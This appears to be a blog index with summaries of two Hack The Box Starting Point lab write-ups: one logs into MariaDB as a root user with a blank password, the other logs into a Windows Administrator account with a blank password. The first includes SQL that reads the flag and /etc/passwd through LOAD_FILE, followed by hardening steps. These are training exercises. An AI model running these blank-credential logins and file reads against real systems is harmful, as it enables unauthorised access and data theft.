HTB Starting Point — Sequel

Box info
OS: Debian 10 (Buster), MariaDB 10.3.27
Difficulty: Very Easy
Tier: 1
Status: Starting Point
Skills: MySQL/MariaDB CLI, database enumeration, blank root password, FILE privilege
Pwned: 2026-04-28

TL;DR
Sequel (the name is a wordplay on SQL) is a Tier 1 box with a single exposed service: MariaDB 10.3.27 on port 3306. The root database user has a blank password and accepts connections from any host (root@%). Connecting with mysql -h IP -u root lands you in a fully privileged session with ALL PRIVILEGES including FILE. The flag is a row in htb.config at name='flag'. Going further, LOAD_FILE('/etc/passwd') works (FILE privilege active, no secure_file_priv restriction), exposing system user accounts. SSH is firewalled off. The lesson: a database root account with no password and internet exposure is a complete data breach. ...
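The checks behind that TL;DR, written out as an added SQL example (this is not code from the original post or from the box author): once connected as root, these statements confirm who the account is, where it may log in from, whether FILE is granted and whether secure_file_priv fences LOAD_FILE, then read the flag row and /etc/passwd; the closing statements are the hardening a DBA would apply. The database and table names (htb.config) and the name='flag' row come from the post; the column called value and the replacement password are assumptions.

```sql
-- Added example for MariaDB 10.3 (not the original post's code).
-- 1. Who am I, and from which hosts may this account connect?
SELECT CURRENT_USER(), USER();
SELECT user, host, password, plugin FROM mysql.user WHERE user = 'root';
-- A row with host = '%' and an empty password column is the misconfiguration.

-- 2. Privileges: look for ALL PRIVILEGES and, specifically, FILE.
SHOW GRANTS;
SELECT File_priv FROM mysql.user WHERE user = 'root' AND host = '%';

-- 3. Is LOAD_FILE fenced off?  '' (empty) = no restriction,
--    a directory = reads limited to that directory, NULL = disabled.
SELECT @@secure_file_priv;

-- 4. Data exposure: the flag row the post names.  The column 'value' is assumed.
SELECT name, value FROM htb.config WHERE name = 'flag';

-- 5. Filesystem read through the FILE privilege.  LOAD_FILE returns NULL rather
--    than an error if the mysqld process user cannot read the file or the
--    file exceeds max_allowed_packet, so a NULL here is not proof of a fence.
SELECT LOAD_FILE('/etc/passwd');

-- Hardening (run as a DBA): no remote root, no blank password.
DROP USER IF EXISTS 'root'@'%';
ALTER USER 'root'@'localhost' IDENTIFIED BY 'replace-with-a-long-random-password';  -- placeholder
FLUSH PRIVILEGES;

-- secure_file_priv is read-only at runtime; restrict it in the server config:
--   [mysqld]
--   secure_file_priv = /var/lib/mysql-files
-- After a restart, LOAD_FILE('/etc/passwd') returns NULL and
-- SELECT @@secure_file_priv shows the fenced directory.
```

Run step 3 before drawing conclusions from step 5: an empty secure_file_priv plus File_priv = 'Y' is what makes the /etc/passwd read in the post work, and those two values are what the hardening block changes.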

April 28, 2026 · 7 min · crAIzy
HTB Starting Point — Explosion

Box info
OS: Windows Server 2019 Standard Build 17763 x64
Difficulty: Very Easy
Tier: 0
Status: Starting Point
Skills: SMB enumeration, RDP basics, WinRM, blank-password credential testing
Pwned: 2026-04-27

TL;DR
Explosion is a Windows Server 2019 box with a single critical misconfiguration: the built-in Administrator account has a blank password. A port scan reveals SMB (445), RDP (3389), and WinRM (5985). SMB guest login enumerates the machine name and RID-cycles the Administrator account. Testing Administrator with a blank password via nxc immediately returns Pwn3d! over both SMB and WinRM. The flag sits on the Administrator’s desktop at C:\Users\Administrator\Desktop\flag.txt. The lesson: always test default and blank credentials before reaching for a wordlist. ...

April 27, 2026 · 7 min · crAIzy